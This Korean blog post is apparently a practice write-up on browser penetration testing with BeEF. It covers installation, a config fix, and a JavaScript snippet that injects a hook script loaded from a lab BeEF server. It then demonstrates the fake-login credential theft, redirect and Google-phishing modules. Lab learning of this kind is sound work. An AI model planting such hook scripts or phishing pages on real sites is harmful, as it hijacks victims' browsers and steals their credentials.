Notice
Recent Posts
Recent Comments
Link
«   2024/12   »
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30 31
Archives
Today
Total
관리 메뉴

쟝이의 세상

BeEF를 활용하여 모의해킹 본문

자료

BeEF를 활용하여 모의해킹

zyangee 2024. 10. 21. 17:29

📌 BeEF

: 웹 브라우저의 보안 취약점을 테스트하고 활용하기 위해 만들어진 침투 테스트 도구

→ 웹 애플리케이션 보안 취약점을 파악하는 데 효과적

📎 주요 기능
1) 브라우저 후킹 (Hooking)
: 사용자가 악성 스크립트가 포함된 웹페이지를 열면 브라우저가 BeEF 서버에 연결
2) 모듈 기반 공격
 - 리다이렉션: 사용자를 임의의 웹페지로 강제로 이동시킴
 - 브라우저 정보 수집: 사용자의 브라우저 버전, 운영체제, IP 주소 등 기본 정보 탐지
 - 피싱: 로그인 페이지를 위조해 피해자의 인증 정보 수집 가능
 - XSS, 클릭재킹 테스트: 웹 사이트가 공격에 얼마나 취약한지 확인
3) 실시간 제어 및 명령 실행
: 후킹된 브라우저에서 실시간으로 명령을 실행할 수 있으며,사용자가 무엇을 클릭하는지 추적하거나 화면을 캡쳐하는 것도 가능

 

✔️ BeEF 설치

sudo apt-get install beef-xss

 

✔️ BeEF 실행

cd /usr/share/beef-xss
sudo ./beef

⚠️ 오류 발생

더보기
└─$ sudo ./beef 
[16:42:09][!] ERROR: Don't use default username and password!
[16:42:09]    |_  Change the beef.credentials.passwd in /etc/beef-xss/config.yaml

/etc/beef-xss/config.yaml 파일의 비밀번호 값을 수정해줘야 함!

 

vi /etc/beef-xss/config.yaml

아래의 초기 비밀번호 값을 변경해준 후

sudo ./beef

실행해주기

 

 

📌 웹 취약점 공격 시도

✔️ 웹 페이지에 스크립트 삽입

var script = document.createElement('script');
script.src = 'http://192.168.133.138:3000/hook.js';
document.head.appendChild(script);

→ BeEF 서버와 웹 브라우저 간 연결 시도가 가능

👇🏻 웹에 스크립트 실행 화면

👇🏻 BeEF 서버 연결 화면

 

✔️ Pretty Theft - 사용자의 아이디와 비밀번호 훔치기

사용자에게 SNS 인증을 다시하라는 메시지 발생 → 가짜 로그인 페이지를 보여주어 사용자가 입력하는 값을 그대로 가져온다.

사용자가 입력한 값을 그대로 받아오는 것을 볼 수 있다.

 

✔️ Redirect Browser - 특정 URL로 리다이렉트

redirect URL에 http://google.com을 입력하였을 때 내가 만든 사이트로 들어가면 구글로 리다이렉트 되는 것을 확인할 수 있다.

결과에 구글로 리다리렉트 된 것을 확인할 수 있다.

 

✔️ Google Phishing - Google을 사칭하여 사용자로부터 민감한 정보를 수집하는 사이버 공격

도메인 주소를 보면 주소 자체는 내가 만든 웹 페이지의 주소이지만, 사용자의 정보를 수집하기 위해 구글을 사칭한 것이다.

입력한 값은 그대로 전달이 되는 것을 확인할 수 있다.